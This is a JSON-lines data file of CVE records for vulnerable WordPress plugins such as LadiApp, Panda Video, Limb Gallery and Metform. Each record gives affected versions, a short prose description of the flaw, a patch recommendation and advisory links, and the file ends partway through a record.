{"CVE_ID":"CVE-2023-4626","slug":"ladipage","versionImpact":"4.3","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and including, 4.3. This makes it possible for authenticated attackers with subscriber-level access and above to update the 'ladiflow_hook_configs' option.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47dccf26-6c8d-4418-a874-c29749bee537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47dccf26-6c8d-4418-a874-c29749bee537?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4218","slug":"affieasy","versionImpact":"1.1.7","description":"The AffiEasy plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.7. This is due to plugin improperly releasing the tagged and patched version of the plugin - the vulnerable version is used as the core files, while the patched version was included in a 'trunk' folder. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095a2262-1da2-4f79-896c-6d48eb079a7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095a2262-1da2-4f79-896c-6d48eb079a7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affieasy\\\/tags\\\/1.1.6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affieasy\\\/tags\\\/1.1.6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3972","slug":"similarity","versionImpact":"3.0","description":"The Similarity WordPress plugin through 3.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55dfb9b5-d590-478b-bd1f-d420b79037fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55dfb9b5-d590-478b-bd1f-d420b79037fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5456","slug":"pandavideo","versionImpact":"1.4.0","description":"The Panda Video plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.4.0 via the 'selected_button' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ab250a-387c-431e-9b75-16ede94bf0ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ab250a-387c-431e-9b75-16ede94bf0ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/widgets\\\/PandaButton.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/widgets\\\/PandaButton.php#L237\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49260","slug":"limb-gallery","versionImpact":"1.5.7","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Limb WordPress Gallery Plugin \u2013 Limb Image Gallery allows Code Injection.This issue affects WordPress Gallery Plugin \u2013 Limb Image Gallery: from n\/a through 1.5.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11354","slug":"ultimate-youtube-video-player","versionImpact":"3.3","description":"The Ultimate YouTube Video & Shorts Player With Vimeo plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the del_ytsingvid() function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete single playlists.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/delsingvid.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/delsingvid.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c99510-fd57-4268-8e35-6f7e6f912b7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c99510-fd57-4268-8e35-6f7e6f912b7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12816","slug":"notice-board-by-towkir","versionImpact":"3.1","description":"The NOTICE BOARD BY TOWKIR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'notice-board' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-board-by-towkir\\\/trunk\\\/towkir-notice-board.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-board-by-towkir\\\/trunk\\\/towkir-notice-board.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notice-board-by-towkir\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notice-board-by-towkir\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/069b2f3e-da9d-476c-a9fa-1b7d445a704b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/069b2f3e-da9d-476c-a9fa-1b7d445a704b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1517","slug":"sina-extension-for-elementor","versionImpact":"3.6.0","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text, Countdown Widget, and Login Form shortcodes in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/shaonsina\\\/sina-extension-for-elementor\\\/commit\\\/5cb89db08b15a3011800ee0f6ad68c69c5a256d5\",\"name\":\"https:\\\/\\\/github.com\\\/shaonsina\\\/sina-extension-for-elementor\\\/commit\\\/5cb89db08b15a3011800ee0f6ad68c69c5a256d5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-countdown.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-countdown.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-login-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-login-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-fancytext.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-fancytext.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246221\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246221\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sina-extension-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sina-extension-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e699f521-9133-41b0-b667-528da78fec06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e699f521-9133-41b0-b667-528da78fec06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1487","slug":"wowpth","versionImpact":"2.0","description":"The WoWPth WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c683c2e-4f7f-4862-b844-6bdc3d1885dd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c683c2e-4f7f-4862-b844-6bdc3d1885dd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5123","slug":"contact-us-page-contact-people","versionImpact":"3.7.4","description":"The Contact Us Page \u2013 Contact People plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style\u2019 parameter in all versions up to, and including, 3.7.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-us-page-contact-people\\\/trunk\\\/classes\\\/class-people-contact.php#L743\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-us-page-contact-people\\\/trunk\\\/classes\\\/class-people-contact.php#L743\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-us-page-contact-people\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-us-page-contact-people\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcffc816-ff56-4875-b234-91dd1d073721?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcffc816-ff56-4875-b234-91dd1d073721?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7650","slug":"bizcalendar-web","versionImpact":"1.1.0.50","description":"The BizCalendar Web plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.0.50 via the 'bizcalv' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bizcalendar-web\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bizcalendar-web\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0640538c-b076-453c-a32e-f33b4e1c77ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0640538c-b076-453c-a32e-f33b4e1c77ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3811","slug":"eu-cookie-law","versionImpact":"3.1.6","description":"The EU Cookie Law for GDPR\/CCPA WordPress plugin through 3.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262924da-e269-4008-a24f-9f26a033b23e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262924da-e269-4008-a24f-9f26a033b23e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0084","slug":"metform","versionImpact":"3.1.2","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via text areas on forms in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, which is the submissions page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f7d9fe-e95f-4ddf-9bce-2aeac3c2e946\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f7d9fe-e95f-4ddf-9bce-2aeac3c2e946\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2845078%40metform&new=2845078%40metform&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2845078%40metform&new=2845078%40metform&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/#description\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36717","slug":"kali-forms","versionImpact":"2.1.1","description":"The Kali Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to incorrect nonce handling throughout the plugin's function. This makes it possible for unauthenticated attackers to access the plugin's administrative functions via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5bcf456-f991-4775-8c3e-a3c0212a5765?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5bcf456-f991-4775-8c3e-a3c0212a5765?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4718","slug":"font-awesome-4-menus","versionImpact":"4.7.0","description":"The Font Awesome 4 Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'fa' and 'fa-stack' shortcodes in versions up to, and including, 4.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L214\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L197\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc59510c-6eaf-4526-8acb-c07e39923ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc59510c-6eaf-4526-8acb-c07e39923ad9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5127","slug":"wp-font-awesome","versionImpact":"1.7.9","description":"The WP Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping on 'icon' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L101\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L70\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L85\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L83\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L99\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59ee0b56-c11f-4951-aac0-8344200e4484?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59ee0b56-c11f-4951-aac0-8344200e4484?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L53\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3947","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_settings() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c132cfc1-03b3-4616-9a66-871e88c857cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c132cfc1-03b3-4616-9a66-871e88c857cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3971","slug":"similarity","versionImpact":"3.0","description":"The Similarity WordPress plugin through 3.0 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dec5719-105d-4989-a97f-bda04d223322\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dec5719-105d-4989-a97f-bda04d223322\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4868","slug":"extensions-for-elementor","versionImpact":"2.0.31","description":"The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's EE Events and EE Flipbox widgets in all versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4322d9d6-13b6-4476-9eb5-fea4aff2e5ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4322d9d6-13b6-4476-9eb5-fea4aff2e5ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/events\\\/widgets\\\/ee-events.php#L2632\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/events\\\/widgets\\\/ee-events.php#L2632\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/flipbox\\\/widgets\\\/ee-flipbox.php#L1515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/flipbox\\\/widgets\\\/ee-flipbox.php#L1515\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49258","slug":"limb-gallery","versionImpact":"1.5.7","description":"Path Traversal: '...\/...\/\/' vulnerability in Limb WordPress Gallery Plugin \u2013 Limb Image Gallery.This issue affects WordPress Gallery Plugin \u2013 Limb Image Gallery: from n\/a through 1.5.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-download-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-download-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12529","slug":"brodos-net-onlineshop","versionImpact":"2.0.2","description":"The brodos.net Onlineshop Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'BrodosCategory' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brodos-net-onlineshop\\\/tags\\\/2.0.1\\\/class.onlineshop-init.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brodos-net-onlineshop\\\/tags\\\/2.0.1\\\/class.onlineshop-init.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a672c6-e911-46bb-a55b-c5788eedca3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a672c6-e911-46bb-a55b-c5788eedca3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6810","slug":"quiz-organizer","versionImpact":"2.9.1","description":"The Quiz Organizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been 